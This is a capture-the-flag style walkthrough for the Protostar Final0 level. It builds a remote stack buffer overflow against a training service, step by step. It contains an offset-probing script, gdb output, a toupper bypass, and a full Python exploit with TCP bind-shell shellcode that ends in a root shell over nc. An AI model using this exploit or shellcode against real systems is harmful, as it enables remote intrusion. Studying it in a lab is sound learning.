Protostar 0x15 - Final0

Prev: 0x14 - Format4
Next: 0x16 - Final1

In these final levels, we'll be remotely implementing the exploits we've worked with previously, starting with a remote stack buffer overflow.



The beginning of "main" looks similar to the Net exercises we worked on, so we know it will function the same. If we use netstat, we can see that this level's port (defined in the source code as "2995") is listening:


$ netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
...
tcp        0      0 *:2994                  *:*                     LISTEN
tcp        0      0 *:2995                  *:*                     LISTEN
tcp        0      0 *:2996                  *:*                     LISTEN


Now, let's check the code for this "get_username" function so we can understand our objective. First, it creates a buffer, initializes it with zeroes using memset, and then calls "gets" to request user input to write to the buffer. Then, newline characters are converted to zeroes, the case is converted to uppercase via toupper, and a duplicate of the string (obtained via strdup) is returned to "main." Finally, regardless of what we enter, "main" rejects our buffer and prints it back to us.

The overall objective is simple - think back the our Stack5 exercise. We will need to overflow our buffer, overwrite the return address of "get_username," and return into our buffer (or after the overwritten return address) which will contain some shellcode.

However, we have to do all of this "remotely" using sockets. So, although we may be tempted to start by debugging in gdb, we know that the stack has a tendency to vary between gdb and normal execution. Instead, let's first see if we can cleverly deduce the offset of the return address from our buffer through regular input to the function.

We'll first create a program that allows us to properly communicate with the server:


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2995))

buffer = "A" * 4
buffer += "\n"
s.send(buffer)

response = s.recv(1024)
print response


The one key difference from the Net exercises we did is the use of "gets" instead of "fread." If we check the man page for "gets," we see that it "reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF." So, to let the program we've finished sending our input, we need to add a newline "\n" character (orange text above).

If we run this program, we see:


$ python final0.py
No such user AAAA


It works! Now, how can we use this to determine the offset of the return address?

Well, we know that info stored on the stack is 32-bit aligned, so what if we craft a loop that continually adds 4 bytes of input? Eventually, we will hit the saved ebp which crashes our program, but not before the call to "printf." We know this from disassembling "main" in gdb, and noticing that it uses offsets of esp and not ebp:


(gdb) disas main
Dump of assembler code for function main:
0x08049833 <main+0>:    push   %ebp
...
0x08049874 <main+65>:   call   0x804975a <get_username>
0x08049879 <main+70>:   mov    %eax,0x1c(%esp)
0x0804987d <main+74>:   mov    $0x8049c7b,%eax
0x08049882 <main+79>:   mov    0x1c(%esp),%edx
0x08049886 <main+83>:   mov    %edx,0x4(%esp)
0x0804988a <main+87>:   mov    %eax,(%esp)
0x0804988d <main+90>:   call   0x8048bac <printf@plt


Then, if we add another 4 bytes to the string that just overwrote the saved ebp, we should hit the saved return address which will generate a second crash and this time it won't get to the "printf."

So, we will create a loop which continuously adds 4 bytes of input, and then checks to see whether we receive the "printf" string "No such user..." Once we do not receive that string, we know that we've overwritten the saved return address and thus eip. Then, if we check the /tmp directory, we'll find two core dumps: one for when we overwrote ebp, and a newer one from when we overwrite the saved return address.

Let's first enable core dumps. Note that, although this feels like cheating, it's an optional step that will allow us to confirm our above thinking. In real practice, we would simply assume the above to be true and proceed "blindly" until we reach a point that might indicate otherwise.


$ su root
Password:
No directory, logging in with HOME=/
root@protostar:/# ulimit -c unlimited


And now, we can craft our script:


import socket
import time

i = 0

while(1):
        time.sleep(.1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('localhost', 2995))

        buffer = "A" * 512
        buffer += "B" * (i * 4)
        buffer += "\n"
        s.send(buffer)

        response = s.recv(1024)
        print response

        print "offset is %d" % (i * 4)

        if(response[:2] != "No"):
                break


Our "while" loop, in order, does this:
  1. Waits a short duration (for visibility purposes while we watch it run)
  2. Connects to the level's server
  3. Crafts a buffer which is 512 As, plus some Bs which are a growing multiple of 4
  4. Appends a newline "\n" character which will convert to a null-terminator
  5. Sends the buffer
  6. Receives and prints the response
  7. Prints the current number of Bs printed (or in other words, the current offset from the end of our 512-byte buffer)
  8. Checks the server response, and if the first two characters are not "No," it breaks
Thus, as explained before, once the code concludes we will have two core dumps: one from when ebp was overwritten, and one from when eip was overwritten.


$ python final0.py
...

No such user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

offset is 16

offset is 20


Just as expected, the final input (in which we printed "offset is 20") did not receive a "printf" from the server. This means that we must've overwritten eip! If we check the /tmp directory, we find our two core files:


$ ls
core.4.final0.8995  core.4.final0.8996  final0.py


Great! Everything appears to work as expected. Now, we could examine this core file if we wanted to, but that requires root access which, again, feels a bit like cheating. Let's instead use gdb as "user" with the understanding that the stack will likely be located elsewhere.

Since "main" is going to fork the process, we'll break at the start of main so that the registers are initialized, and then set eip to the start of "get_username." Then, we will break on the return address, and check esp to see what memory address we are at.


$ gdb /opt/protostar/bin/final0
GNU gdb (GDB) 7.0.1-debian
...
Reading symbols from /opt/protostar/bin/final0...done.
(gdb) break *main
Breakpoint 1 at 0x8049833: file final0/final0.c, line 37.
(gdb) disas get_username
Dump of assembler code for function get_username:
0x0804975a <get_username+0>:    push   %ebp
...
0x08049832 <get_username+216>:  ret
(gdb) break *0x08049832
Breakpoint 2 at 0x8049832: file final0/final0.c, line 34.
(gdb) set $eip = 0x0804975a
(gdb) c
Continuing.
AAAA
Breakpoint 2, 0x08049832 in get_username () at final0/final0.c:34
34      in final0/final0.c
(gdb) x/i $eip
0x8049832 <get_username+216>:   ret
(gdb) x/x $esp
0xbffff7cc:     0xb7eadc76


Now, we have a rough idea of where to start, though "rough" is certainly the keyword. Let's use a method similar to our final method from our Stack5 solution in order to give us the highest probability of locating our shellcode:

  1. We will fill the initial buffer (512 bytes plus the 20 bytes before the saved return address) with a giant NOP slide, followed by some shellcode
  2. Then, we'll provide 4 bytes to overwrite the saved return address with a stack address that we guess
  3. We'll have yet another giant NOP slide, followed by the same shellcode
The double-shellcode-injection will give us a much higher probability of success! But before we begin crafting the Python script, we need to remember the "toupper" function. How will that affect us? Well, we can't use any bytes that translate to lowercase ASCII characters, our else they'll be altered. So, we should craft some shellcode that doesn't use this characters, right?

Sure, we could do that. Or, we could examine the source code more closely:


"toupper" iterates over our input buffer by checking "i < strlen(buffer)." If we check the man page for "strlen," we see that it calculates the length of the string minus the terminating null byte, meaning that it is expecting a null-terminated string. However, we provide our string via "gets," which we know from earlier is not concerned with null bytes. So, to avoid the "toupper" issue entirely, we can begin our string with a null byte!

Now, the final question: which shellcode should we use? For this exploit, we'll inject a shellcode that binds a shell to an available port, and listens for connections. This will allow us to connect and interact with the shell at our leisure!

If you search for "TCP shell bind" you should be able to find something suitable. I used this code from shell-storm provided by Julien Ahrens.

Here is our final Python script. Note that it is extremely verbose, but that is done intentionally for clarity purposes:



import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2995))

shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89" \
        "\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66" \
        "\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3" \
        "\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89" \
        "\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79" \
        "\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" \
        "\xe3\x41\x89\xca\xcd\x80"

stop_toupper = "\x00"
NOP_1 = "\x90" * (532 - len(shellcode) - len(stop_toupper) - 32)
padding = "\x41" * 32
new_ret = struct.pack("<I", 0xbffffb00)
NOP_2 = "\x90" * 100
end = "\n"

payload = stop_toupper + NOP_1 + shellcode + padding + new_ret + NOP_2 + shellcode + end
s.send(payload)

s.close()


To break it down, here is the structure of our payload:
  1. A null byte, which tricks "toupper's" loop into thinking our string is 0 bytes long, bypassing "toupper" entirely
  2. A NOP slide
  3. Our payload
  4. Some padding, in case any local variables between the end of our buffer and the saved return address are overwritten
  5. The new return address, which we hope is somewhere in one of our two NOP slides
  6. A second NOP slide
  7. A second payload
  8. A newline character to tell "gets" that we are done with our input
Is using two shellcodes overkill? Absolutely. However, running it for the first time, we can see that it worked without us needing to make tweaks:


$ python final.py
$ netstat -lt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address    State
tcp        0      0 *:41708           *:*                LISTEN
...
tcp        0      0 *:1337            *:*                LISTEN
...


Our port is ready and waiting for us! If we attempt to connect to it from another machine, we're in:

$ nc 192.168.172.2 1337
whoami
root


Terrific!